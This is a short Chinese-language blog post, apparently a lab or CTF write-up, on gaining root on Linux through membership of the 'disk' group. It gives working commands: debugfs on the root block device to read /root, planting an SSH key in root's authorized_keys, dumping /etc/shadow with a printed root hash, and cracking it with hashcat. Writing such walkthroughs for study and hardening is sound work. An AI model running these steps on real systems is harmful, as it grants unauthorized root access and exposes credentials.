临渊羡鱼

退而结网

0%

Disk group 提权

Posted on Edited on In ,
Disk group 允许用户完全访问/dev/中包含的任何块设备。由于/dev/sda一般是根系统文件,而磁盘组对该设备拥有完全的读写权限,可以用于写入或读取任意文件内容。换而言之,有了disk group,实际上我们就是root.

原文: https://vk9-sec.com/disk-group-privilege-escalation/

Disk group 允许用户完全访问/dev/中包含的任何块设备。由于/dev/sda一般是根系统文件,而磁盘组对该设备拥有完全的读写权限,可以用于写入或读取任意文件内容

Identify

  1. id命令
1
2
$ r id
uid=1000(dora) gid=1000(dora) groups=1000(dora),6(disk)
  1. 列出/dev设备onwer和group owner, 查找所属group是disk的分区
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
$ls -l /dev
drwxr-xr-x 7 root root         140 Aug  3  2024 disk
brw-rw---- 1 root disk    253,   0 Aug  3  2024 dm-0
brw-rw---- 1 root disk      8,   0 Aug  3  2024 sda
brw-rw---- 1 root disk      8,   1 Aug  3  2024 sda1
brw-rw---- 1 root disk      8,   2 Aug  3  2024 sda2
brw-rw---- 1 root disk      8,   3 Aug  3  2024 sda3
...

$ find /dev -group disk
/dev/btrfs-control
/dev/dm-0
/dev/sda3
/dev/sda2
/dev/sda1
/dev/sda
/dev/sg1
/dev/loop7
/dev/loop6
/dev/loop5
/dev/loop4
/dev/loop3
/dev/loop2
/dev/loop1
/dev/loop0
/dev/loop-control
  1. 查看所有分区
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ df -h
Filesystem                         Size  Used Avail Use% Mounted on
udev                               947M     0  947M   0% /dev
tmpfs                              199M  1.2M  198M   1% /run
/dev/dm-0                          9.8G  5.1G  4.2G  55% /
tmpfs                              992M     0  992M   0% /dev/shm
tmpfs                              5.0M     0  5.0M   0% /run/lock
tmpfs                              992M     0  992M   0% /sys/fs/cgroup
/dev/loop0                          62M   62M     0 100% /snap/core20/1611
/dev/loop2                          50M   50M     0 100% /snap/snapd/18596
/dev/loop1                          64M   64M     0 100% /snap/core20/1852
/dev/loop3                          92M   92M     0 100% /snap/lxd/24061
/dev/loop4                          68M   68M     0 100% /snap/lxd/22753
/dev/sda2                          1.7G  209M  1.4G  13% /boot
tmpfs                              199M     0  199M   0% /run/user/1000

Exploit

确认用户所属disk group之后,我们可以使用debugfs来枚举整个磁盘数据以获取root级权限,因为我们还拥有对磁盘块文件完全的读写访问权限,我们可以写入任意文件,换而言之,有了disk group,实际上我们就是root,只不过是以一种迂回的方式。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
$ debugfs /dev/dm-0
debugfs 1.45.5 (07-Jan-2020)
debugfs:  ls
debugfs:  cd /root
debugfs:  cat proof.txt
492fe994bfe90fd82258b4d6d1118374
debugfs:  cat .profile
# ~/.profile: executed by Bourne-compatible login shells.

if [ "$BASH" ]; then
  if [ -f ~/.bashrc ]; then
    . ~/.bashrc
  fi
fi
  1. 写authorized_keys, 写/etc/passwd ……
1
debugfs:  cp id_rsa.pub /root/.ssh/authorized_keys
  1. 读root公私钥、读/etc/shadow, hashcat爆破root密码 …..
1
2
debugfs:  cat /etc/shadow
root:$6$AIWcIr8PEVxEWgv1$3mFpTQAc9Kzp4BGUQ2sPYYFE/dygqhDiv2Yw.XcU.Q8n1YO05.a/4.D/x4ojQAkPnv/v7Qrw7Ici7.hs0sZiC.:19453:0:99999:7:::
1
hashcat -m 1800 root.hash